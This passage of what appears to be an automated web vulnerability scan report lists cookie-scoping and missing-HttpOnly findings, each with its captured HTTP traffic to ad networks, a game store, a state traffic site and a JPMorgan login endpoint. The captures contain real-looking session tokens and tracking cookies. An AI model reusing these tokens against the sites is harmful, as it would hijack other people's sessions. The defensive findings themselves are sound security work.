t33s_4slnCqQsf7S3WAlj03YWHyJRno5upAQH1stolYHPvqQTECcUpZ67ooRzBV4mkY3bKZEn_LF-ss2qc9_oFL9fN5_ShqXOpZWPh4CRijgdjXszUE1r9Us2uEGPpDbSA5CU09EIO8uHCZTpQ2E0CSOfk4oag3R69kTz8pBBQ8HMWQVbWm; Domain=.turn.com; Expires=Sun, 08-Jan-2012 16:35:47 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Tue, 12 Jul 2011 16:35:47 GMT


10.36. http://sales.liveperson.net/hc/57386690/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/57386690/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/57386690/?&site=57386690&cmd=mTagInPage&lpCallId=308320658747-492943215649&protV=20&lpjson=1&page=http%3A//www.homedepot.com/&id=7510587419&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-global-english&activePlugin=none&cobrowse=true&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=265974457269152000; HumanClickSiteContainerID_57386690=STANDALONE; LivePersonID=-16101514677756-1310488556:-1:-1:-1:-1; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDQAQCCBQS=IPKCCCKDEINMHCPDPDNCPOFP; HumanClickACTIVE=1310488554952

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:36:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_57386690=STANDALONE; path=/hc/57386690
Set-Cookie: LivePersonID=-16101514677756-1310488556:-1:-1:-1:-1; expires=Wed, 11-Jul-2012 16:36:05 GMT; path=/hc/57386690; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 12 Jul 2011 16:36:05 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"308320658747-492943215649","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

10.37. http://store.popcap.com/cart.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.popcap.com
Path:   /cart.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cart.php?a=a1&oid=11464&icid=bwbundle_HP_PLARGE_pc_EN HTTP/1.1
Host: store.popcap.com
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_id=461b1f76-758a-4ffe-87df-c12b77a2c13c; lcid=1033; geo_location=US; demographics=000000000000000; cookie_version=5; s_vnum=1312174800889%26vn%3D1; s_fv=flash%2010; __utma=163442877.1858697665.1310503156.1310503156.1310503156.1; __utmc=163442877; __utmz=163442877.1310503156.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-1840915809-1310503155904; s_vi=[CS]v1|270E587F051D3BC7-60000103000EBB3F[CE]; PHPSESSID=82rvc45ec9c02afcbeu2lourh7; lv=1310503202; user_profile=003000000000000; s_cc=true; __utmb=163442877; s_invisit=true; s_sq=popcapcom%3D%2526pid%253DInformation%252520%25253E%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//store.popcap.com/cart.php%25253Fa%25253Da1%252526oid%25253D11464%252526icid%25253Dbwbundle_HP_PLARGE_pc_EN%2526ot%253DA

Response

HTTP/1.1 302 Found
Date: Tue, 12 Jul 2011 20:48:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lv=1310503701; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com
Location: https://store.popcap.com/cart.php?a=track_a&oid=11464&installtag=&icid=bwbundle_HP_PLARGE_pc_EN
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 0


10.38. https://store.popcap.com/payment.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.popcap.com
Path:   /payment.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /payment.php HTTP/1.1
Host: store.popcap.com
Connection: keep-alive
Referer: https://store.popcap.com/cart.php?a=track_a&oid=11464&installtag=&icid=bwbundle_HP_PLARGE_pc_EN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_id=461b1f76-758a-4ffe-87df-c12b77a2c13c; lcid=1033; geo_location=US; demographics=000000000000000; cookie_version=5; s_vnum=1312174800889%26vn%3D1; s_fv=flash%2010; __utma=163442877.1858697665.1310503156.1310503156.1310503156.1; __utmc=163442877; __utmz=163442877.1310503156.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-1840915809-1310503155904; s_vi=[CS]v1|270E587F051D3BC7-60000103000EBB3F[CE]; PHPSESSID=82rvc45ec9c02afcbeu2lourh7; __utmb=163442877; lv=1310503702; user_profile=003000000000000; s_cc=true; s_invisit=true; s_sq=popcapcom%3D%2526pid%253DCommerce%252520%25253E%252520Cart%2526pidt%253D1%2526oid%253Dhttps%25253A//store.popcap.com/payment.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:48:32 GMT
Server: Apache
Set-Cookie: nickname=deleted; expires=Mon, 12-Jul-2010 20:48:31 GMT; path=/; domain=.popcap.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 49903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>PopCap Games -
...[SNIP]...

10.39. http://www.burstnet.com/enlightn/3599//E519/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/3599//E519/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/3599//E519/?1310503191 HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMS=/; CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:39:51 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs; path=/; expires=Thu, 12-Jul-2012 20:39:51 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

10.40. http://www.burstnet.com/enlightn/3893//392A/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/3893//392A/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/3893//392A/?1310503167 HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?01AD=2-2-C853333EC652166FAF7E3D0062149675759E1277B74C3E759400B711FCF64130-AD2295ECB4683944460A9D5F04A88CAF4EB4854AF4BF19B0D63B2248D4643BCA&01RI=02572381EDA0358&01NA=&m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMS=/; CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:39:28 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs; path=/; expires=Thu, 12-Jul-2012 20:39:28 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

10.41. http://www.burstnet.com/enlightn/5158//2CB4/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/5158//2CB4/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/5158//2CB4/?1310503209 HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&ptid=HOME
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMS=/; CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:40:09 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 12-Jul-2012 20:40:09 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

10.42. http://www.burstnet.com/enlightn/8117//3E06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/8117//3E06/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/8117//3E06/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/allgames.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMS=/; CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:39:53 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd^jx.1Ebs^h2.1Ebs; path=/; expires=Thu, 12-Jul-2012 20:39:52 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

10.43. http://www.burstnet.com/enlightn/8171/99D2/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/8171/99D2/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/8171/99D2/?01AD=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q&01RI=364AB5B4B4DE32D&01NA= HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/allgames.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx; 56Q8=CT-1

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:39:27 GMT
Content-Length: 43
Connection: close
Set-Cookie: 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; expires=Tue, 09-Aug-2011 20:39:27 GMT; path=/; domain=.www.burstnet.com
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1Bq.1Dzj^193.1G7W^16w.1ETB^19q.1GB0^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EZy^13v.1EZU^13R.1EZx^1AF.1GGd; path=/; expires=Thu, 12-Jul-2012 20:39:27 GMT; domain=.burstnet.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

GIF89a.............!.......,...........D..;

10.44. http://www.imiclk.com/cgi/r.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imiclk.com
Path:   /cgi/r.cgi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi/r.cgi?m=3&mid=GQuHAQvv&did=games HTTP/1.1
Host: www.imiclk.com
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/allgames.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OL8U=2-2-C853333EC652166FAF7E3D0062149675759E1277B74C3E759400B711FCF64130-AD2295ECB4683944460A9D5F04A88CAF4EB4854AF4BF19B0D63B2248D4643BCA; CH=36067,00000,32766,00000,18654,53bro,18661,53bro,24785,53c27,34637,00000,18653,53bro,33114,00000,37746,5MfXs,35701,00000,37991,00000,36760,00000,38066,00000,19029,58T8w,28363,53br0,34606,00000,28882,5OYl5,30627,00000,34030,00000,32680,00000,19036,58T8w,35153,00000,34985,00000,30628,00000,24783,53c27,34600,00000,28881,5OYl5,34628,00000,32620,5MfXs,24775,00000,34986,00000,22244,53br0,34505,00000,34604,00000,19037,58T8w,24782,53c27,28873,5OYl5,34698,00000,34506,00000; RQ=3763,5JCcZ,3151,57rv5,3173,53c1h,3190,53c1h,3238,53bro,3281,5JD0W,3677,53bro,3678,53c1h,3754,5OYl5,985,5OYl5,1445,5OYl5,1470,53c1h,1478,5OYl5,1513,5OYl5,1514,53bro,1515,5OYl5,2398,53bro,2570,53c1h,1267,53br0,2831,5OYl5,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,1042,58T8w,1182,58T8w,1271,58T8w,1273,58T8w,1286,58T8w,1339,58T8w,1909,5OYl5,2170,5JCdD,1211,5OYl5,2739,5JCfo,3218,5JCeW,3246,5JCyZ,3425,58T8w,3491,5JDlu,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,3391,53c27; YU=3e170243b30558bee730f315249abaeb-5OYl5

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (CentOS)
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Cache-Control: no-store
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 12 Jul 2011 20:39:51 GMT
Content-Length: 1473
Connection: close
Set-Cookie: CH=36067,00000,32766,00000,18654,53bro,18661,53bro,24785,53c27,34637,00000,18653,53bro,33114,00000,37746,5MfXs,35701,00000,37991,00000,36760,00000,38066,00000,19029,58T8w,28363,53br0,34606,00000,28882,5OYlT,30627,00000,34030,00000,32680,00000,19036,58T8w,35153,00000,34985,00000,30628,00000,24783,53c27,34600,00000,28881,5OYlT,34628,00000,32620,5MfXs,24775,00000,34986,00000,22244,53br0,34505,00000,34604,00000,19037,58T8w,24782,53c27,28873,5OYlT,34698,00000,34506,00000; domain=.imiclk.com; path=/; expires=Wed, 11-Jul-2012 20:06:40 GMT
Set-Cookie: RQ=3763,5JCcZ,3151,57rv5,3173,5OYlT,3190,5OYlT,3238,5OYlT,3281,5JD0W,3677,5OYlT,3678,5OYlT,3754,5OYl5,985,5OYl5,1445,5OYl5,1470,5OYlT,1478,5OYl5,1513,5OYl5,1514,5OYlT,1515,5OYl5,2398,5OYlT,2570,5OYlT,1267,53br0,2831,5OYl5,2848,5OYlT,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,5OYlT,2921,5OYlT,2887,53br0,3468,53br2,1042,5OYlT,1182,5OYlT,1271,5OYlT,1273,5OYlT,1286,5OYlT,1339,5OYlT,1909,5OYl5,2170,5JCdD,1211,5OYl5,2739,5JCfo,3218,5JCeW,3246,5JCyZ,3425,5OYlT,3491,5JDlu,3387,5OYlT,3388,53brH,3389,53brJ,3390,53c1h,3391,53c27; domain=.imiclk.com; path=/; expires=Wed, 11-Jul-2012 20:06:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2//EN"><html><head><title></title></head><body>
<img src="http://ad.trafficmp.com/a/bpix?adv=598&amp;id=43&amp;r=&amp;rnd=1310503191" alt="" border="0" width=
...[SNIP]...

11. Cookie without HttpOnly flag set  previous  next
There are 376 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



11.1. http://511.dot.ri.gov/hb/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://511.dot.ri.gov
Path:   /hb/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hb/ HTTP/1.1
Host: 511.dot.ri.gov
Proxy-Connection: keep-alive
Referer: http://www2.tmc.state.ri.us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.8.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; RhodeIslandNGWeb=1679163402.20480.0000

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=7AAAE4CFA20D02FA44A642301503BF8A; Path=/hb
Location: http://511.dot.ri.gov/hb/main.jsf
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Wed, 13 Jul 2011 00:33:05 GMT


11.2. https://iblogin.jpmorgan.com/sso/action/federateLogin  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://iblogin.jpmorgan.com
Path:   /sso/action/federateLogin

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sso/action/federateLogin?URI=https%3a%2f%2fmm.jpmorgan.com%3a443%2ffavicon.ico&msg=+&securityLevel=0&cs=V05Mtro7P%2f8lpwB5gAv4hsgbAKM%3d HTTP/1.1
Host: iblogin.jpmorgan.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6A6CB0EFBC048F9424BECBC81EE443A5; __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:30:27 GMT
Server: Apache
Set-Cookie: pajpm5=sailSession; Domain=.jpmorgan.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Set-Cookie: JSESSIONID=C3F5993BDA54ECF5782ED241F20F3239; Path=/sso; Secure
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 16407


                   <SCRIPT type="t